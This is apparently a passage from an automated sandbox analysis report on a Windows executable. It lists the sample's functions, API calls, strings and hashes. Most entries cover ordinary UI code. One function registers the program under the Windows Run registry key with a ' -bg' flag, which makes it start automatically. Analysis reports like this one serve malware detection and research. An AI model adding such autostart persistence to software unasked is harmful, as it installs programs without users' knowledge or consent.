                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MenuMessageSend$Popup$AppendCreateHookWindows$CheckClientCurrentH_prologItemScreenThreadTrackUnhook
                                                                                                      • String ID: m_grouping
                                                                                                      • API String ID: 3751001009-127938912
                                                                                                      • Opcode ID: 1f8e2db403b7ab26126cbe9a2c3f18ce479fe9b5e9eafd756550d331fb070f32
                                                                                                      • Instruction ID: bbd7bc8b2dd145a7c3241d2c311b6c2d45d9bb0b691878e86f8ed313926fefc6
                                                                                                      • Opcode Fuzzy Hash: 1f8e2db403b7ab26126cbe9a2c3f18ce479fe9b5e9eafd756550d331fb070f32
                                                                                                      • Instruction Fuzzy Hash: AA317071E00129BFDF11AF95EC85EAFBB79FB48355F10402AF204B61A0C6755D508B68
                                                                                                      Function 004220D2 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 128COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 004220D7
                                                                                                      • wsprintfW.USER32 ref: 0042212F
                                                                                                        • Part of subcall function 00421ECF: __EH_prolog.LIBCMT ref: 00421ED4
                                                                                                        • Part of subcall function 00421ECF: lstrlenW.KERNEL32(00000000,00001000,?,7591E0B0,?,00000000,?,?,0042787E,00000000,?,?,00000000,?,?,00000000), ref: 00421F07
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$lstrlenwsprintf
                                                                                                      • String ID: 4AD$list$list_label$list_order$list_text$listcmd_count$text_%03d
                                                                                                      • API String ID: 2567740082-2577178954
                                                                                                      • Opcode ID: 2e67ccdfff9f7888ad16dd00099531d5f73aa3897929cec1ea21dd92361b2384
                                                                                                      • Instruction ID: e7e23b065db194d1572c46c94f300028d9289180093b55409c1c5ee61a9916a6
                                                                                                      • Opcode Fuzzy Hash: 2e67ccdfff9f7888ad16dd00099531d5f73aa3897929cec1ea21dd92361b2384
                                                                                                      • Instruction Fuzzy Hash: D5418971E00218BADB10EBD5DD56EFE7778AF08714F10026EF511732D1DA785A44CB69
                                                                                                      Function 00433782 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00000407,00000000,00000000), ref: 0043379E
                                                                                                      • GetParent.USER32(?), ref: 004337AB
                                                                                                      • SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 004337B5
                                                                                                      • GetParent.USER32(?), ref: 004337BF
                                                                                                      • SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 004337C9
                                                                                                      • GetParent.USER32(?), ref: 004337D3
                                                                                                      • SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 004337D9
                                                                                                      • MessageBoxW.USER32(00000000,00455DB0,00000000,00000000), ref: 004337F0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Send$Parent
                                                                                                      • String ID: Noshel
                                                                                                      • API String ID: 3726960072-4231138648
                                                                                                      • Opcode ID: f90a37abea50271424a1ac880a224fb7687173930e495001228e9346f24add9b
                                                                                                      • Instruction ID: ab34b24a809c121fe1e81170c7c6225c49992a293b36226584c8b94786fd635d
                                                                                                      • Opcode Fuzzy Hash: f90a37abea50271424a1ac880a224fb7687173930e495001228e9346f24add9b
                                                                                                      • Instruction Fuzzy Hash: DF0112F160425C7BC5105F67DCD8C2BBEACE78E699B22993BB144E2950C72ABC054778
                                                                                                      Function 004365CD Relevance: 15.1, APIs: 10, Instructions: 104COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 004365F3
                                                                                                      • GetDC.USER32(00000000), ref: 0043660F
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00436637
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00436643
                                                                                                      • DrawTextW.USER32(?,?,000000FF,?,00000424), ref: 0043667D
                                                                                                      • SelectObject.GDI32(?,?), ref: 0043668F
                                                                                                      • DeleteObject.GDI32(?), ref: 0043669A
                                                                                                      • GetSystemMetrics.USER32(00000047), ref: 004366D8
                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 004366E9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$MetricsSelectSystem$CreateDeleteDrawFontIndirectReleaseText
                                                                                                      • String ID:
                                                                                                      • API String ID: 2845678740-0
                                                                                                      • Opcode ID: 0dd1cdc975fa90c191e1b3f6d902dcce56dbf230f0a94245f5353f29224a4e99
                                                                                                      • Instruction ID: eefc56dc4ba074cc05ed8a12dcb2865e0cc639ee1b886fa549392c0575cec96a
                                                                                                      • Opcode Fuzzy Hash: 0dd1cdc975fa90c191e1b3f6d902dcce56dbf230f0a94245f5353f29224a4e99
                                                                                                      • Instruction Fuzzy Hash: FE419F31900629EFCF11CFA8C889AEEBBB5FF48740F15816AE915B7251C774A901DF98
                                                                                                      Function 00428264 Relevance: 15.1, APIs: 10, Instructions: 92COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetWindowPlacement.USER32(?,?), ref: 00428275
                                                                                                      • GetSystemMetrics.USER32(0000004F), ref: 004282AE
                                                                                                      • GetSystemMetrics.USER32(0000004D), ref: 004282B4
                                                                                                      • GetSystemMetrics.USER32(0000004E), ref: 004282BB
                                                                                                      • GetSystemMetrics.USER32(0000004C), ref: 004282C1
                                                                                                      • GetSystemMetrics.USER32(0000004D), ref: 004282C8
                                                                                                      • GetSystemMetrics.USER32(0000004C), ref: 004282CD
                                                                                                      • SetRect.USER32(?,00000000), ref: 004282D4
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004282E1
                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00428336
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem$Window$Rect$MovePlacement
                                                                                                      • String ID:
                                                                                                      • API String ID: 3067230557-0
                                                                                                      • Opcode ID: 870f133595a486a6bf26aa3be2a5cb3c4c7eade40f216451adebc92329adc0dc
                                                                                                      • Instruction ID: 8bd225a0a0a47aa8a0b0c8ad36270c41b07badd969337c926225b95b87dd0b4f
                                                                                                      • Opcode Fuzzy Hash: 870f133595a486a6bf26aa3be2a5cb3c4c7eade40f216451adebc92329adc0dc
                                                                                                      • Instruction Fuzzy Hash: 4731EC71F00229AFDF04DBA8DD85AEEBBF9EF48710F10412AE605A7250DB75AD41CB94
                                                                                                      Function 00437058 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 122windowstringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetMenuItemCount.USER32(?), ref: 004370A1
                                                                                                      • GetMenuItemInfoW.USER32(00000064,?,00000001,?), ref: 004370ED
                                                                                                      • lstrlenW.KERNEL32(?), ref: 00437179
                                                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00437199
                                                                                                      • SetMenuItemInfoW.USER32(00000064,?,00000001,?), ref: 004371AE
                                                                                                      • GetMenuItemCount.USER32(00000064), ref: 004371BA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$CountInfo$lstrcpylstrlen
                                                                                                      • String ID: 1$d
                                                                                                      • API String ID: 1621444650-1642009170
                                                                                                      • Opcode ID: 1ca1fd472200b41c09e6647ce77050067d7ba725e4774e09c060fc82fda90c07
                                                                                                      • Instruction ID: ab7f1e7837498ced5c99314300850d25f9edd8aff39392c0aee1037423d7d266
                                                                                                      • Opcode Fuzzy Hash: 1ca1fd472200b41c09e6647ce77050067d7ba725e4774e09c060fc82fda90c07
                                                                                                      • Instruction Fuzzy Hash: 5E419DB290420AEFDF30DF94D985AAEBBB4FB08354F10952AE845A7350D7349944CF64
                                                                                                      Function 004215AA Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 81windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 004215AF
                                                                                                      • GetDlgItem.USER32(?,?), ref: 004215EB
                                                                                                      • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000001,80000000,80000000,80000000,80000000,?,00000000,00000000), ref: 00421614
                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 0042165D
                                                                                                      • SendMessageA.USER32(?,00000418,00000000,00000190), ref: 00421670
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CreateH_prologItemWindow
                                                                                                      • String ID: ,$Test$tooltips_class32
                                                                                                      • API String ID: 4127292747-3622912971
                                                                                                      • Opcode ID: 7013f67a6a3a61f2bc4ba126bb7e41f52d559334fb0934d6c13ba9f3cc7e98e6
                                                                                                      • Instruction ID: 4a65af810be17d5466e0fa3a19395ecaa88b91b0f0ad7673a24ad41d318fb192
                                                                                                      • Opcode Fuzzy Hash: 7013f67a6a3a61f2bc4ba126bb7e41f52d559334fb0934d6c13ba9f3cc7e98e6
                                                                                                      • Instruction Fuzzy Hash: 7F216072A00218FFDB10CF64DC84AEEBBB9FB18750F11813AF905A6290C7754D44CB68
                                                                                                      Function 00436419 Relevance: 13.6, APIs: 9, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetStockObject.GDI32(00000011), ref: 0043642D
                                                                                                      • GetObjectW.GDI32(00000000,0000005C,?), ref: 0043643A
                                                                                                      • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00436464
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00436491
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 004364A9
                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 004364B9
                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 004364C5
                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 004364D2
                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 004364DC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: System$Metrics$CreateFontIndirectObject$InfoParametersStock
                                                                                                      • String ID:
                                                                                                      • API String ID: 4204584070-0
                                                                                                      • Opcode ID: ab5df36e46a9c33517faad016574ca79f5ca83dd5ec28b48bc76654b598bc8f7
                                                                                                      • Instruction ID: 8b5ddb9cb34b4abd4672a7546851bcf7586be4e33035710cce3a73d3990b9d3d
                                                                                                      • Opcode Fuzzy Hash: ab5df36e46a9c33517faad016574ca79f5ca83dd5ec28b48bc76654b598bc8f7
                                                                                                      • Instruction Fuzzy Hash: 86312B72D443149FEF548FA48C89BDA7BB8FB04304F0400AAEA08AF186E7B46505CF65
                                                                                                      Function 0043754D Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92registrystringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0043755B
                                                                                                        • Part of subcall function 00437536: GetModuleFileNameW.KERNEL32(?,?,?,00437425,?,?,00000208), ref: 00437542
                                                                                                      • RegOpenKeyW.ADVAPI32(-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 004375F7
                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00437620
                                                                                                      • lstrlenW.KERNEL32(?), ref: 0043764A
                                                                                                      • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00437662
                                                                                                      Strings
                                                                                                      • " -bg, xrefs: 004375B7
                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 004375F1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
